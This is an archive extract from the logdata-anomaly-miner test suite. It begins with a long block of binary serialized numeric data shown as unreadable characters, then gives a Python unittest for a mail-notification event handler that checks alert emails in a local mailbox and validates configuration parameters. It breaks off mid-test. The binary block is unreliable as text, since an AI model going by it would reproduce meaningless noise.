COXcx?Rhh C0/?Rhh CҳWԦ?Rhh C6+ͼRhh C`-俔Rhh CZc?Rhh CXWM?Rhh C0"z2?Rhh C%s{1?Rhh CȰ0?Rhh CY/6 ׿Rhh Cb !?Rhh CO5῔Rhh C ->c9꿔Rhh C ~Tc?Rhh CԭMѿRhh Cp3MRhh CK]ɿRhh C*(?Rhh C4 ݣl?Rhh C\0hc뿔Rhh CN?Rhh C3s"?Rhh C`MuJ?Rhh CҪ a1?Rhh CtenֿRhh C\Z ?Rhh ChW?Rhh Ca;?Rhh C翔Rhh CEFRhh C0a0˿Rhh Cdb?Rhh Cx῔Rhh Cr*œh濔Rhh C|fW?Rhh C=࿔Rhh C-DxR` ?Rhh Ck ?Rhh CZRl?Rhh CN쿔Rhh CP~{k9?Rhh Cڮ^O?Rhh CLNEx?Rhh CxOP?Rhh C8{g?Rhh C+)?Rhh CD6 H?Rhh C,5jQ>'ܿRhh C;?Rhh C|<?Rhh CbXv?Rhh C4O?Rhh Ck*?Rhh C/?Rhh C1пRhh CƈI?Rhh C2返Rhh Cp俔Rhh C?Rhh C鿔Rhh CD @|?Rhh C-e_I࿔Rhh CYu?Rhh Cnrj2返Rhh CX3?Rhh Cf^翔Rhh CgoȿRhh CZpNRhh CUGWU8ӿRhh CL5쿴ۿRhh CV]⿔Rhh CLwO?Rhh CxaL῔Rhh CyxRhh C@+?Rhh C$4`,?Rhh CX dB鿔Rhh C%;꿔Rhh CTz?Rhh C5[t?Rhh C1俔Rhh Cߠ߿Rhh Cz?Rhh C\3?Rhh C2E㿔Rhh Ch݂KտRhh C[mؿRhh C{*?Rhh CFv?Rhh C`@?Rhh CТG返Rhh CpR?Rhh C@* qZRhh Czx?Rhh Ct 0?Rhh C$㿔Rhh C?Rhh C2X#忔Rhh CZ6H_?Rhh CϦտRhh C YjY?Rhh CԕcD?Rhh C悤gRhh C@XYF?Rhh C@yܱ?Rhh CD.S翔Rhh Cb^?Rhh C/zSRhh C0ʵ?Rhh Cx%?Rhh C(x㿔Rhh Cj5N?Rhh CNaW?Rhh C]+?ĿRhh C8鿔Rhh C(L9W߿Rhh C<]?Rhh C f?Rhh Cl{E?Rhh C {࿔Rhh C;)IG?Rhh Cz?Rhh Ck?Rhh C=`W޿Rhh Cp&翔Rhh C iR?Rhh C5+,@ݿRhh CpwνRhh CjƎM?Rhh C~ܕ$?Rhh CtN ?Rhh C1K.?Rhh C@W.WRhh C儳)ܿRhh Ch @?Rhh C@%Rhh C_ĿRhh C=7PҰRhh CDdA?Rhh CHY)ɿRhh CnPi\O?Rhh C3r3rRhh Cyo濔Rhh CQĒ俔Rhh CL^翔Rhh Cl?F?Rhh CM[gRhh Cm5CRhh CLܝ+?Rhh C _VsٿRhh CT|2c޿Rhh CY2 ݿRhh C[X?Rhh C{4?Rhh C|X 9?Rhh ClReH俔Rhh Cha?Rhh C8)'ҿRhh CdO ᅯRhh C#?Rhh C e,]¿Rhh C?Rhh CPc俔Rhh C.ϿRhh C8fI ӿRhh C3]?Rhh CdRhh CbZC1eRhh C2 ՊRhh CZ ?Rhh C?Rhh CZh)?Rhh CPBA?Rhh Ctn>ۿRhh CIA뿔Rhh CjᅯRhh Ck?Rhh CpyI?Rhh C ڴRhh C]e?Rhh CDT4忔Rhh CdM0?Rhh C=P?Rhh Cl|ԿRhh C,俔Rhh CxRhh C8ݛRhh C?Rhh C ?޿Rhh CH?Rhh C`ާ]޿Rhh CN?Rhh C.S?Rhh CP^J?Rhh Cs?(6?Rhh C Rhh CU?Rhh ChrbU?Rhh CY ?Rhh C(rϿRhh CCOq?Rhh CO4~?Rhh CX1޿Rhh CZ;b쿔Rhh Cpz俔Rhh C,)Py?Rhh Cdy?Rhh CbOl~?Rhh CxF?Rhh CF[⿔Rhh CLK?Rhh C0v=?Rhh CF6#=C?Rhh CSYRhh CZ0p|?Rhh C`|h?Rhh CNG0}ᅯRhh CB?Rhh C @࿔Rhh Cp\U?Rhh CyR?Rhh C(hz^?Rhh C-`k?Rhh CrW%?Rhh C@8dvԿRhh C@ 返Rhh CX7ED?Rhh C?Rhh Cp8m?Rhh C[;$濔Rhh C,mV{?Rhh Cb ?Rhh CF,0?Rhh C dؿRhh C8?Rhh C!:B濔Rhh Cև?%?Rhh C~2d쿔Rhh Cn Np⿔Rhh CT ߿Rhh Cs=cÿRhh C0C࿔Rhh C8J^濔Rhh Ci] ?Rhh C2ѻɫ?Rhh CƿRhh C4*5֖ݿRhh Cb o{翔Rhh C@,آRhh C87q?Rhh CPH[?Rhh C0̿?Rhh CTnٿRhh CZp$?Rhh C\俔Rhh C}пRhh C t6l?Rhh C'9ᅯRhh C(JG?Rhh C+t%y?Rhh Cm_~fRhh C䈣d12?Rhh CL&ؿRhh C&?Rhh C0[̊?Rhh Cŋ<ȋ?Rhh C5i鿔Rhh C~)tq?Rhh C1?Rhh C r]k ҿRhh CPJ4?Rhh CDJ?Rhh C"?Rhh C`#,?Rhh Cqi:?Rhh C!俔Rhh C܍k)Rhh C翔Rhh CU̳Rhh CXdst῔Rhh C${\ZZٿRhh Cp;Rhh CJGR?Rhh C{*OÿRhh Cp?Rhh ClKP?Rhh C>$jl?Rhh C)tR@?Rhh C[ᅯRhh C T?Rhh C`\hG?Rhh C y?Rhh CDÎ ?Rhh Cq,ᅯRhh C& Rhh C 6䡿Rhh CβO?Rhh Cs⿔Rhh C'F?Rhh CأpA?Rhh Cb{'࿔Rhh CdQ?Rhh CVz㿔Re](hh C,F|?Rhh C;=c?Rhh CF2ҿRhh CM ?Rhh CՐ"?Rhh C-DhJ?Rhh C=?Rhh CB返Rhh C.返Rhh CT#`??Rhh CP"?Rhh CL¾?Rhh CpӃ?Rhh CO?Rhh Cý>?Rhh C]eU꿔Rhh CtĚ4ԿRhh C0=p`?Rhh CF#p?Rhh C.EV?Rhh C@Z"?Rhh C VRhh C2#?Rhh Cj%0Da?Rhh CuY$?Rhh C@y+_Rhh CU^?Rhh CD|ͮ?Rhh C Ѯg9?Rhh CĐi?Rhh CൾԿRhh CZ+K?Rhh C,f?Rhh Cܧ ?Rhh C0xGaRhh CaRhh CLq῔Rhh CR;ZRhh C)'u?Rhh Cr O?Rhh Cx'?Rhh C8|(鿔Rhh Cy-ϲ?Rhh C M?Rhh C nRhh C]4Rhh C@Ϋ S!ۿRhh ChJٿRhh CQjǿRhh CQ?Rhh C`9R?Rhh CaG?Rhh Cv?Rhh Cn!<}_x?Rhh C Oi濔Rhh C F1wRhh CO8G?Rhh C;"翔Rhh C=eԿRhh CPm]Rhh Cf?Rhh C 0?Rhh C2x濔Rhh C, &꿔Rhh C4=zmy?Rhh C\1?Rhh C0"#K俔Rhh CH ?Rhh C&?Rhh C8yB俔Rhh CՔ?Rhh CJ=鿔Rhh Cp4?Rhh C:~LP࿔Rhh CP9DG쿔Rhh C@@l?Rhh C`20x?Rhh C8(?Rhh CEPJ?Rhh CCz?Rhh CQ?Rhh C@ܪ.?Rhh C`x(Rhh C5?Rhh Cw=[_?Rhh CVѵ俔Rhh C &6㿔Rhh C#R?Rhh C! ̿?Rhh C 5`nԿRhh C'ſRhh CH8dfhRhh C0P翔Rhh C0n`Z?Rhh C(;?Rhh C(p{?Rhh Cd ҿRhh CI߿Rhh C7'Y쿔Rhh C!xҿRhh Ch?Rhh CV' 翔Rhh C@DKݥRhh CgY *?Rhh C(?Rhh CGӂz?Rhh CPs?Rhh C^Y?Rhh C[jz?Rhh C ῔Rhh C O?Rhh Cx)ɿRhh C{t?Rhh C ύRhh C2d(W?Rhh CL濔Rhh Cy#ҿRhh Cb:'/X返Rhh C|nj?Rhh C,w첹῔Rhh C ^뿔Rhh C5?Rhh Ct$x?Rhh C@]ݨ?Rhh C: (aD濔Rhh C~NҔ[Rhh CnxRhh C?Rhh Cʿ0ѿRhh C()Q{?Rhh CqW?Rhh Cxԣ?Rhh Ctr?Rhh C;)?Rhh CDcͿRhh C@۴g7Rhh C@xа쿔Rhh C D)_˿Rhh CZu&쿔Rhh CkiRhh CL-?Rhh C@kx뿔Rhh C>Rhh CXZgXٿRhh Ch翔Rhh CpǭWѿRhh C(RݑR?Rhh Cd?Rhh C(@A@>?Rhh Cֵms?Rhh CPé0tӿRhh C id뿔Rhh C |q?Rhh C,f!^Rhh Cg?Rhh C>m?Rhh C!Lн?Rhh C匳4?Rhh C0뿔Rhh Cx­|뿔Rhh CUA¿Rhh C8(ԿRhh CύؿRhh CI'쿔Rhh C)=P쿔Rhh CD[$?Rhh CnSkS࿔Rhh Ct/俔Rhh C&c??Rhh CpqRt ?Rhh C{㿔Rhh CvX쿔Rhh C{VFʿRhh C0s?Rhh CoX;?Rhh C m{̿Rhh CVwJ?Rhh C0S1kĿRhh Cq!?Rhh CVYؿRhh C7㿔Rhh Cs6A?Rhh C<&?Rhh C`# ʻRhh C)Ղ鿔Rhh C:kqO?Rhh CZB?Rhh C|P?Rhh C3 뿔Rhh CRW忔Rhh CRhh COxd俔Rhh CZ2Ǧ?Rhh Cp返Rhh C/i<?Rhh CKԿRhh C~w,?Rhh CiԿRhh C3~{Rhh CY?Rhh C0>& ࿔Rhh C ⿔Rhh CRǿRhh CѿRhh CNοRhh CM-?Rhh CȒ忔Rhh C8nE?Rhh C[Y忔Rhh CL6?Rhh C :?Rhh Cd0⿔Rhh CbuRhh CWRhh C'~X$?Rhh Ckw?Rhh CH6?Rhh C ?Rhh C73u?Rhh C!*ܿRhh Cvj?Rhh C(nÿRhh CP^om 꿔Rhh CJ_b%?Rhh C=]?Rhh Cu)?Rhh C<'Y?Rhh Cڃ?HT?Rhh CX zfٿRhh C UP0?Rhh C/v?Rhh C2R?Rhh C}qRhh CvWϾRhh C`SՃLĿRhh CF>?Rhh CTM*ֿRhh C( QڬRhh CA%뿔Rhh C‚OP?Rhh C1b?Rhh CϣڿRhh C俔Rhh C%;}ۿRhh CCh?Rhh CCGB⿔Rhh C(G쿔Rhh C Rhh C0q?Rhh CL?Rhh Cb'ƿRhh C@rWB?Rhh Cv\m8 ῔Rhh CWЊ࿔Rhh CЄ?Rhh CP9'ʡ?Rhh C€.?Rhh C&TQ뿔Rhh CQ#+ڿRhh C^2 ?Rhh CD忔Rhh C>\Ȝ翔Rhh Cpk ?Rhh C|?Rhh C g?Rhh C d:F?Rhh C1?Rhh CW@??Rhh CAڵ翔Rhh Cx4ʿRhh C@r׿Rhh CnBѢʿRhh Cg6OH?Rhh C뿔Rhh Cp  Rhh C<̍Q?Rhh CP"?Rhh CqE Q?Rhh CDFӿRhh C(+#?Rhh C y~Rhh CPi3^?Rhh C2wX1꿔Rhh C@QUwRhh C?Rhh C~đ返Rhh CzC?Rhh CmH2?Rhh C:B?Rhh C5.?Rhh Cp B[?Rhh CMKÿRhh C00CÿRhh C|ۓK]?Rhh C"UCG俔Rhh C. ͿRhh CX^ !ӿRhh Cfo\?Rhh CI7῔Rhh C\0` 翔Rhh CG837?Rhh C=ſRhh C`E ?Rhh Ctb~nۿRhh C֣?Rhh CLYֿRhh C&t?Rhh Cdo5#TֿRhh Ccߞ뿔Rhh Cj:huܿRhh CJ-ᅯRhh CX$o?Rhh C4I?Rhh Cs2&?Rhh CC&?Rhh C7:Rhh C8῔Rhh C20+ 忔Rhh C"Rhh C!>ԿRhh C0-鿔Rhh CIW?Rhh C|bЗ࿔Rhh C̩(R?Rhh CHv}>OVƿRhh CSSI2?Rhh CUKR?Rhh C0'ĩ?Rhh C(.?Rhh CbyпRhh C՞Rhh CˆFRhh C@TQRhh CP<ⅹRhh CN1oq?Rhh Ck2v?Rhh C,&?Rhh CN?Rhh CB῔Rhh C?Rhh C »aѿRhh C@j:0%i?Rhh CHd'?Rhh CssᅯRhh Cvܤ?Rhh CbxTпRhh C?Rhh CrNP꿔Rhh C ֞?Rhh C}NKٿRhh CֿRhh CtᅯRhh CfT?Rhh C 熍ؿRhh C "dĿRhh Cg_[?Rhh C@҄v"Rhh C:X-㿔Rhh CbÿRhh C$%l~G῔Rhh C ?Rhh C“Lf޿Rhh C@QRk翔Rhh CY?Rhh Cdo4?Rhh CyW̘?Rhh Cܗ6W~࿔Rhh Cߨ?Rhh C ) ӿRhh CdGE|?Rhh CJ鿔Rhh CzV@QȿRhh CqٿRhh C޿Rhh C9?Rhh CKRhh CpZm?Rhh C 8N?Rhh C kB̿Rhh ClV鿔Rhh Cr`G?Rhh C]S?Rhh Cv?Rhh C="?Rhh Cq^?Rhh C\>忔Rhh CFɦ?Rhh C׿Rhh CKiοRhh Cn}˿Rhh Cu][|?Rhh CT"2ѿRhh C*I_K?Rhh C-á?Rhh Cƺk:?Rhh C œ?Rhh C * 鿔Rhh CH?Rhh CN3Ӟ?Rhh CXz9?Rhh C2Ɇ ᅯRhh C;Ê?Rhh C7z?Rhh CPE?Rhh C0/݊?Rhh CD<l?Rhh C(4ؿRhh C`5ӱ?Rhh CƠRhh C8x 꿔Rhh C,)`fRhh C 'i-sݿRhh C  ?Rhh CWO鿔Rhh C3?Rhh Cwq?Rhh Cڱz?Rhh CT@={?Rhh CVcj꿔Rhh C8h ?Rhh C}ߡRhh Cr:?Rhh C( 꿔Rhh CI ?Rhh C_ycؿRhh C3&9_^忔Rhh Cxٰ?Rhh Cv ?$?Rhh CF=ݷL뿔Rhh CL܎I꿔Rhh CTqRhh CW῔Rhh Cj?Rhh C4OֿRhh CzM;?Rhh C@?Rhh CX?Rhh CO;?Rhh CȖۊ翔Rhh C0jRhh Cp?Rhh C$ M忔Rhh Cpu?Rhh C[wn̿Rhh C'ؤ?Rhh CZQRhh C4俔Rhh C\;ٝؿRhh C@W?Rhh C'ݿRhh CRi꿔Rhh CL\{ҿRhh Cڜ㿔Rhh C}WRhh CXdg/[˿Rhh C!mRhh Cj?Rhh C:L"㿔Rhh Cp0?Rhh C?Rhh C|X9?|ҿRhh Cn.[쿔Rhh C}k㿔Rhh CR obk濔Rhh C*i^⿔Rhh C^=꿔Rhh CΧebRhh CH|r?Rhh C` ?Rhh C忔Rhh C0`?Rhh CC%j?Rhh Cd?Rhh C Y-[ɿRhh C$g#`?Rhh C} 鿔Rhh CC?Rhh Cf(쿔Rhh Cc1S⿔Rhh C?Rhh CdMD?Rhh C-ji?Rhh CBeM?Rhh CxWᅯRhh CK/ZؿRhh CH?Rhh Cཱྀ !¿Rhh CS.\,?Rhh C@\?Rhh C4 =[῔Rhh C,zN?Rhh C`8mRhh CU?Rhh C8k]?Rhh C~j?Rhh CB@GCᅯRhh Ci0 ǿRhh C%T翔Rhh C^W?Rhh Cv?Rhh C6(+&ҿRhh CuC!?Rhh C^yM?Rhh Cڭp*?Rhh CV5!5?Rhh Cϩ?Rhh Cb⨸/꿔Rhh CI!R$?Rhh CY옣s߿Rhh CN1`!返Rhh C@;?Rhh CH čǁ?Rhh CDfZq?Rhh Ce4>AᅯRhh CA%=?Rhh C :W俔Rhh C~4ݿRhh CUvk?Rhh Ch ?Rhh C8?Rhh C4r࿔Rhh CxV쿔Rhh CN?Rhh CШW쿔Rhh C G8!?Rhh C9ƒRhh CRn?Rhh C,ڹ?Rhh Cլp#?Rhh C5r~V?Rhh CHq_?Rhh Cx!ͿRhh C\ =࿔Rhh C" ?Rhh C_?Rhh CPˏ]*Rhh CDGB?Rhh CN*?Rhh CU2鿔Rhh C oȿRhh C0zaٿRhh C87?Rhh C^o4뿔Rhh CT3P㿔Rhh C翔Rhh CM@返Rhh C@Rn#?Rhh C6 忔Rhh CB0뿔Rhh CH3IBB ?Rhh C4S;U|?Rhh CjM㰿Rhh ChreݿRhh C}F㿔Rhh Cq9BͿRhh CX[?Rhh C(NMoK?Rhh C4 9Ŏ꿔Rhh Cl b῔Rhh C=+?Rhh C ?ϣ??Rhh C`k|Rhh C WؿRhh CSQRhh CKȴb?Rhh C夑?Rhh C|HӮ,ڿRhh C@?Rhh Cp\m?Rhh CHۿRhh CОrt濔Rhh CBV?Rhh CsdE?Rhh CLZJz῔Rhh CpURhh Cxf㿔Rhh CG返Rhh CVʏ?Rhh CX.q?Rhh C0- E?Rhh C@qH?Rhh Ch'?Rhh C5Ӄ$?Rhh CY)Rhh C|?Rhh C1 ysRhh C@['Rhh Ch|2@?Rhh CPQjRhh Cob/9Rhh C4z?Rhh C`cٿRhh CS8g׿Rhh Cb|X?Rhh C mVRhh CչtURhh CU6\ӿRhh C `?Rhh CH<-?Rhh CRhh CQ-?Rhh CY;eٿRhh Cpg!տRhh C Rhh CtO%r߿Rhh Cu?Rhh C z?Rhh CsοRhh C X"Rhh C&էD?Rhh Cq08Rhh C4`%?Rhh C>4῔Rhh Cʰ+?Rhh Cl?Rhh CeW俔Rhh C.`x5?Rhh C.eᅯRhh CH ̿Rhh Ct;q忔Rhh CbEӿRhh Cd?Rhh C0&ܿRhh C7JmѿRhh C@r (?Rhh C<?Rhh CWF.@+ᅯRhh CJӾ0w?Rhh CPQWfѿRhh C8[ ?Rhh C,Rhh CBylh?Rhh CRtտRhh CV"p?Rhh CP+N ?Rhh CLLZ?Rhh Cn˜?Rhh Cft9Rhh Cv/??Rhh Cc࿔Rhh CJxT῔Rhh C(%5 㿔Rhh CDC㿔Rhh Ch_{kEͿRhh C(oê?Rhh C2g߿Rhh C& ˞YRhh CRhh CL亿Rhh CRRhh C?r"?Rhh Ckp?Rhh Cn#?Rhh CTq塞Rhh C`,|Rhh CB?Rhh Cز$[$ȿRhh C5I?Rhh C?Rhh Ca8忔Rhh CH\?Rhh C?O쿔Rhh Cy?Rhh CP뿔Rhh C,ſRhh C,O῔Rhh C ٿRhh CBQ?Rhh CHa v?Rhh C٬^ͿRhh Cr?Rhh C:`dRhh C%{0?ᅯRhh CPHL?Rhh CFp)k?Rhh C sѿRhh C\УdտRhh CR) 1返Rhh C ]õpѿRhh C8Z忔Rhh Ct|F=?Rhh CNN῔Rhh Cp¿Rhh C0]l?Rhh CӸh꿔Rhh C*&?Rhh C"Ka?Rhh C t51?Rhh Cp?Rhh CRrDB?Rhh Cfd=Rhh CXR忔Rhh C(G27?Rhh CzČ9?Rhh CXEy=?Rhh CyC 㿔Rhh C:oRhh Ci쿔Rhh CE?Rhh Cד 0ؿRhh CլݿRhh C47_eҿRhh C/0#Fi返Rhh C=b?Rhh C~鼿Rhh C? ῔Rhh Czy;ᅯRhh CnkWe濔Rhh C*cce?Rhh C"_?Rhh Cj2'⿔Rhh CϦӿRhh C\,yHFڿRhh CPymѿRhh CV ?Rhh C+ȴ?Rhh C}ɷ7?Rhh C>`3;꿔Rhh C:in쿔Rhh CνKqf?Rhh CL忔Rhh Cc2?Rhh C B*':?Rhh Cc޿Rhh C?Rhh CV׋TᅯRhh Cp;>x@࿔Rhh CWx ?Rhh CYU忔Rhh C?Rhh CzO}^??Rhh CMc ?Rhh CP^F߿Rhh C$q1?Rhh CxCzѿRhh C"ݿRhh CᅯRhh C QRhh C4#KڿRhh C\?Rhh CϿRhh Cxm'?Rhh C|,ܿRhh C1N?Rhh CU6D?Rhh C0?Rhh C`۞?Rhh Cf࿔Rhh C/HؿRhh Cĝ#Rhh COL?Rhh C8~返Rhh C–ʿRhh C+5E?Rhh CvJ"?Rhh C@ܿRhh C8濔Rhh C칺”ӿRhh C XB?Rhh C gįRhh CWT?Rhh Chz?Rhh Cxy\IѿRhh CB1鿔Rhh CAj*q׿Rhh CL{G?Rhh C j:wRhh Cm$Q忔Rhh C XAA?Rhh CgSRhh C{ܔ῔Rhh C> 0?Rhh C셡Ȕ忔Rhh CTc1?Rhh CE"+h?Rhh CH"US?Rhh Cx9(Q?Rhh C* ;m?Rhh CgJ0?Rhh CU<[;ᅯRhh C@@Q ۿRhh CY@r=?Rhh CU?Rhh Ce?Rhh CΧ]?Rhh C̚?Rhh C~U翔Rhh C̉?Rhh ChF͝,t?Rhh C5(ؿRhh C0^/{?Rhh Cl?hVW鿔Rhh C4=Al俔Rhh CxM࿔Rhh C*#v῔Rhh C`G Z?Rhh C8bl]࿔Rhh C%?Rhh C;4V 濔Rhh CD Sǵ?Rhh CjڿRhh CX8޿Rhh Cje?Rhh CЙO~࿔Rhh C7%<ᅯRhh Cj?Rhh CDg'֠?Rhh C#+.?Rhh C@ k ҿRhh CJѡN㿔Rhh CZ?Rhh CH={Rhh C8H#ͿRhh C w4?Rhh Cm 濔Re](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/000077500000000000000000000000001500476301700232645ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/events/DefaultMailNotificationEventHandlerTest.py000066400000000000000000000361541500476301700335450ustar00rootroot00000000000000import unittest import sys import subprocess from time import time, sleep from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext from datetime import datetime class DefaultMailNotificationEventHandlerTest(TestBase): """Unittests for the DefaultMailNotificationEventHandler.""" __expected_string = '%s New value for paths %s: %s\n%s: "%s" (%d lines)\n %s' mail_call = "echo p | mail -u mail" mail_delete_call = "echo d | mail -u mail" pid = b" pid=" test = "Test.%s" dtf = "%Y-%m-%d %H:%M:%S" def test1receive_event(self): """ In this test case multiple lines should be received, before sending an email to root@localhost. Make sure no mail notifications are in /var/spool/mail/root, before running this test. This test case must wait some time to ensure, that the mail can be read. """ description = "Test1DefaultMailNotificationEventHandler" match_context = DummyMatchContext(self.pid) fixed_dme = DummyFixedDataModelElement("s1", self.pid) match_element = fixed_dme.get_match_element("match", match_context) dmneh = DefaultMailNotificationEventHandler(self.analysis_context) self.analysis_context.register_component(self, description) t = time() log_atom = LogAtom(fixed_dme.data, ParserMatch(match_element), t, self) dmneh.receive_event(self.test % self.__class__.__name__, "New value for paths %s, %s: %s" % ( "match/s1", "match/s2", repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) t += 600 log_atom = LogAtom(fixed_dme.data, ParserMatch(match_element), t, self) # set the next_alert_time instead of sleeping 10 seconds dmneh.next_alert_time = time() dmneh.receive_event(self.test % self.__class__.__name__, "New value for paths %s, %s: %s" % ( "match/s1", "match/s2", repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self) sleep(1) result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE) exp = self.__expected_string % ("", "match/s1, match/s2", "b' pid='", self.__class__.__name__, description, 2, " pid=\n pid=") exp1 = datetime.fromtimestamp(t - 600).strftime(self.dtf) + exp exp2 = datetime.fromtimestamp(t).strftime(self.dtf) + exp self.assertTrue(exp1 + "\n" + exp2 + "\n\n" in str(result.stdout, "utf-8"), msg="%s vs \n %s" % (exp1 + "\n\n", str(result.stdout, "utf-8"))) # test output_event_handlers self.output_event_handlers = [] dmneh.next_alert_time = time() self.assertTrue(dmneh.receive_event(self.test % self.__class__.__name__, "New value for paths %s, %s: %s" % ( "match/s1", "match/s2", repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) sleep(1) result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) self.assertTrue("0 messages" in str(result.stdout, "utf-8")) self.output_event_handlers = [dmneh] dmneh.next_alert_time = time() self.assertTrue(dmneh.receive_event(self.test % self.__class__.__name__, "New value for paths %s, %s: %s" % ( "match/s1", "match/s2", repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) sleep(1) result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE) self.assertTrue(exp2 in str(result.stdout, "utf-8")) # test suppress detector list self.output_event_handlers = None self.analysis_context.suppress_detector_list = [description] dmneh.next_alert_time = time() self.assertTrue(dmneh.receive_event(self.test % self.__class__.__name__, "New value for paths %s, %s: %s" % ( "match/s1", "match/s2", repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) sleep(2) result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) self.assertTrue("0 messages" in str(result.stdout, "utf-8")) self.output_event_handlers = [dmneh] self.analysis_context.suppress_detector_list = [] dmneh.next_alert_time = time() self.assertTrue(dmneh.receive_event(self.test % self.__class__.__name__, "New value for paths %s, %s: %s" % ( "match/s1", "match/s2", repr(match_element.match_object)), [log_atom.raw_data, log_atom.raw_data], None, log_atom, self)) sleep(1) result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE) self.assertTrue(exp2 in str(result.stdout, "utf-8")) def test2do_timer(self): """In this test case the functionality of the timer is tested. The eventCollectTime must not be 0.""" description = "Test2DefaultMailNotificationEventHandler" dmneh = DefaultMailNotificationEventHandler(self.analysis_context) self.analysis_context.register_component(self, description) t = time() match_context = DummyMatchContext(self.pid) fixed_dme = DummyFixedDataModelElement("s3", self.pid) match_element = fixed_dme.get_match_element("match", match_context) log_atom = LogAtom(fixed_dme.data, ParserMatch(match_element), t, self) dmneh.receive_event(self.test % self.__class__.__name__, "New value for paths %s: %s" % ( "match/s3", repr(match_element.match_object)), [log_atom.raw_data], None, log_atom, self) t = 0 dmneh.do_timer(t) result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) exp = self.__expected_string % ("", "match/s3", "b' pid='", self.__class__.__name__, description, 1, " pid=") + "\n\n" exp1 = datetime.fromtimestamp(t).strftime(self.dtf) + exp self.assertFalse(exp1 in str(result.stdout, "utf-8")) t = time() dmneh.next_alert_time = t + 500 dmneh.do_timer(t) exp2 = datetime.fromtimestamp(t).strftime(self.dtf) + exp result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) self.assertFalse(exp2 in str(result.stdout, "utf-8")) dmneh.next_alert_time = t dmneh.do_timer(t) sleep(2) result = subprocess.run(self.mail_call, shell=True, stdout=subprocess.PIPE) subprocess.run(self.mail_delete_call, shell=True, stdout=subprocess.PIPE) self.assertTrue(exp2 in str(result.stdout, "utf-8")) def test3validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" d = DefaultMailNotificationEventHandler ac = self.analysis_context acp = self.analysis_context.aminer_config.config_properties acp[d.CONFIG_KEY_MAIL_TARGET_ADDRESS] = "test123@gmail.com" acp[d.CONFIG_KEY_MAIL_FROM_ADDRESS] = "test123@gmail.com" acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = "test prefix" acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = 0 acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = 0 acp[d.CONFIG_KEY_ALERT_MIN_GAP] = 0 acp[d.CONFIG_KEY_ALERT_MAX_GAP] = 600 acp[d.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE] = 1 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = True self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = 123 self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = 123.3 self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = {"id": "Default"} self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = () self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = set() self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = b"" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = ["Default"] self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = None self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_SUBJECT_PREFIX] = "" DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = True self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = ["Default"] self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = {"id": "Default"} self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = () self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = set() self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = "" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = b"" self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = None self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = -1 self.assertRaises(ValueError, d, ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = 123 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] = 123.3 DefaultMailNotificationEventHandler(ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = True self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = ["Default"] self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = {"id": "Default"} self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = () self.assertRaises(TypeError, d, ac) acp[d.CONFIG_KEY_EVENT_COLLECT_TIME] = set() self.assertRaises(TypeError, d, ac) 